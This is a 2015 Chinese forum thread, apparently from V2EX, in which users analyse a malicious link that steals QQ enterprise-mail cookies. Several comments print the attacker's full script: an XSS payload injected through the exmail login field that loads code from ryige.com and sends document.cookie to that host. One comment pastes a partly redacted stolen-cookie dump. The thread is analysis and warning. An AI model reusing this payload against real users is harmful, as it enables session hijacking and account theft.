这是一个创建于 3307 天前的主题,其中的信息可能已经有所发展或是发生改变。
http://eeee.washbowl.com.cn/
这个是个挂马地址,请各位大师分析一下
如果我点开 除了 QQ 邮箱的 Cookie 小偷还能获得什么?
第 1 条附言 · 2015-11-02 18:07:59 +08:00
有什么信息可以追踪到写这个 scirpt 的人么...这个网站的主机和 DNS 是?
第 2 条附言 · 2015-11-03 14:01:20 +08:00
提醒:不要用 IPHONE 打开浏览器链接!!!!!!!!
 |
2
jedyu 2015-11-02 13:42:28 +08:00
手贱点了进去,一堆信息被上传了
|
|
5
jedyu 2015-11-02 13:51:29 +08:00
|
 |
7
WenJimmy 2015-11-02 13:53:58 +08:00
不敢点
|
|
8
jedyu 2015-11-02 14:00:32 +08:00
@saxon
c=wxstaytime=1423741712; idqq_account=theCanChange=1; theShowUin=145xxxxxx; [email protected]; EmailCanSeach=1; EmailIsActive=1; UinCanSeach=1; shouldshowmail=1; firstsetidqq=1; MSK=0;; verifysession=h019bd3fd70a412c5e236282065369308f17xxxxxxbc0abc5294375bf583f5axxxxxxaf4f28ba; qz_gdt=m6uqgvwxxxxxxq4ezk4ka; qqmusic_uin=; qqmusic_key=; qqmusic_fromtag=; new_mail_num=14xxxxxx8&1; qm_flag=0; [email protected]; sid=1407607908&exxxxxx115757efa325bc9b271,cvEGXXdNb8dQ.|-1683484644&354xxxxxx6cdfc76ddafdeb,cDA0IfXXXq4mY.; biz_username=261xxxxxx; CCSHOW=0000; username=140761208&1403227908|-16342184644&261233652; ssl_edition=b31.exmail.qq.com; Hm_lvt_bdfb0d7xxxxxx0c5a5a2475c291ac7aca2=14xxxxxx; Hm_lpvt_bdfb0d72xxxxxx5a5a2475c291ac7aca2=14xxxxxx; _ga=GA1.3.1469923463.1445309872; qm_username=14xxxxxx; qm_sid=3240209253e03xxxxxx90db7a6,qSnpxxxxxxHVOR255bUx1by1rSWxxxxxxeFJna18.; RK=CEeuCexxGR; pt_clientip=133b3c0cxxxxxx4f; pt_serverip=b7ff0abfxxxxxx60; pt2gguin=o0014xxxxxx; uin=o0014xxxxxx; skey=@uF8W0XXXc; ptisp=cnc; ptcz=dccb14fd40d2xxxxxx43834eabd88d4d5a73c12561f4be2350fcxxxxxxa985; pgv_info=ssid=s776441213&pgvReferrer=; pgv_pvid=775212126; o_cookie=14xxxxxx; uid=12xxxxxx; dc_vplaying=0; tinfo=14xxxxxx.0000*; wimrefreshrun=0&; autologin=n &u=lockKey8&r=http://eeee.washbowl.com.cn/htmlpage5.html |
 |
10
kikyous 2015-11-02 14:13:52 +08:00
<script>
function test(PARAMS) { var temp = document.createElement("form"); temp.acceptCharset = "utf-8"; //By Wfox temp.action = 'http://m.exmail.qq.com/cgi-bin/login'; temp.method = "post"; temp.style.display = "none"; for (var x in PARAMS) { var opt = document.createElement("textarea"); opt.name = x; opt.value = PARAMS[x]; temp.appendChild(opt); } document.body.appendChild(temp); temp.submit(); } test({ uin: '\\"</script><script src=http://ryige.com/q/8></script>', }); </script> 谁来讲解一下, qq.com 的 cookie 不是被 post 到腾讯的服务器了吗?他们是怎么得到的? |
 |
11
laydown 2015-11-02 14:27:02 +08:00
我没看正文直接点了,我要不要重装系统啊?!!!
|
 |
12
soolby 2015-11-02 14:28:17 +08:00
定期改一下密码复杂一点。
把你的提示问题的答案设置的复杂一点(记得备份) |
 |
13
aliuwr 2015-11-02 14:28:55 +08:00
估计就是这个 http://www.wooyun.org/bugs/wooyun-2015-0144918
10-08 就确认了,还没修复。不知道是不好修复,还是不够重视。 rank 也只给 1 ,真没意思。 @laydown 速度改 QQ 密码就好了。 |
 |
16
skyun 2015-11-02 14:45:13 +08:00
手贱。直接点进去了。。。
|
 |
17
wgf2008 2015-11-02 14:46:55 +08:00
D 它
|
 |
18
ScotGu 2015-11-02 14:48:47 +08:00
既然这个网站可以直接获取 cookies
那么每天上网百度出的一堆垃圾站也可能用这招,只是没有这个有针对性。 看来用邮件客户端很有必要啊。 |
 |
19
Tuibimba 2015-11-02 14:55:37 +08:00 via Android
我的 iphone 被偷了后也收到过这类链接
点进去后发现不对劲 立马把相关密码都改了 |
 |
20
BOYPT 2015-11-02 14:57:26 +08:00
 在匿名模式打开看了下,自动去刷一大堆常见网站,看来有漏用户信息漏洞的公共网站不少啊 |
 |
21
wdlth 2015-11-02 14:57:47 +08:00  1
用的阿里云……
|
 |
22
wohenyingyu01 2015-11-02 15:00:18 +08:00
网址点进去后发现是个新闻网站。。。
|
 |
23
Evi1m0 2015-11-02 15:17:27 +08:00
@BOYPT
两个 iframe ,一些常见网站是人民网的分享接口进行的访问,不是攻击者。 另外一个 iframe 是进行攻击者的操作: <iframe src="http://society.people.com.cn/n/2015/1031/c1008-27760163.html" style="width:100%;height:1200px;border:none"></iframe> <iframe src="/htmlpage5.html" style="display:none"></iframe> --------------- function test(PARAMS) { var temp = document.createElement("form"); temp.acceptCharset = "utf-8"; //By Wfox temp.action = 'http://m.exmail.qq.com/cgi-bin/login'; temp.method = "post"; temp.style.display = "none"; for (var x in PARAMS) { var opt = document.createElement("textarea"); opt.name = x; opt.value = PARAMS[x]; temp.appendChild(opt); } document.body.appendChild(temp); temp.submit(); } test({ uin: '\\"</script><script src=http://ryige.com/q/8></script>', }); document.domain="qq.com"; window.onload=documentrrady; function documentrrady(){ window.location.href="http://ryige.com/server/AddQQUser?c="+encodeURI(document.cookie)+"&u=lockKey8&r="+encodeURI(document.referrer) }; |
|
24
BOYPT 2015-11-02 15:24:43 +08:00
比较好奇的是,往 qq 的 login post 一下,然后 document.domain="qq.com";这样就能从 document.cookie 拿信息了??
|
|
25
skyun 2015-11-02 15:44:14 +08:00
吓得我赶紧改了 QQ 密码,清空了浏览器 cookie ,往常用网站上重新登陆了次,刷新了 cookie 。。。这样就没事了吧?
|
 |
26
Sleebi 2015-11-02 15:47:36 +08:00
这次还好忍住了,先看评论,保命
|
|
27
Evi1m0 2015-11-02 15:58:08 +08:00
嗯,刚才测试了一下,如果你的企业邮箱在登录情况下访问了如上网址,是可以登录你的邮箱。
|
 |
29
yksoft1 2015-11-02 17:24:25 +08:00
用虚拟机开,发现 firefox 下 http://ryige.com/q/8 的脚本未被执行 不知怎么回事
|
 |
30
ChoateYao 2015-11-02 17:35:11 +08:00
难道我去慢了,打开只有一个 IIS 的图标什么事情都没有发生。
|
 |
32
saxon OP @wohenyingyu01 并不是 只是挂了一个 iframe
|
 |
33
RHFS 2015-11-02 18:52:41 +08:00
你还是提醒一下别人别乱点链接吧。。。
我觉得很多人点玩看了评论都吓到了 |
 |
34
curiosity 2015-11-02 19:39:18 +08:00
我擦...点开了...有什么补救方法嘛!
|
|
35
Evi1m0 2015-11-02 19:47:04 +08:00 1
|
 |
38
DevineRapier 2016-07-08 21:18:26 +08:00
@kikyous web 第一课: cookie 在本地, session 在服务器
|
Select Language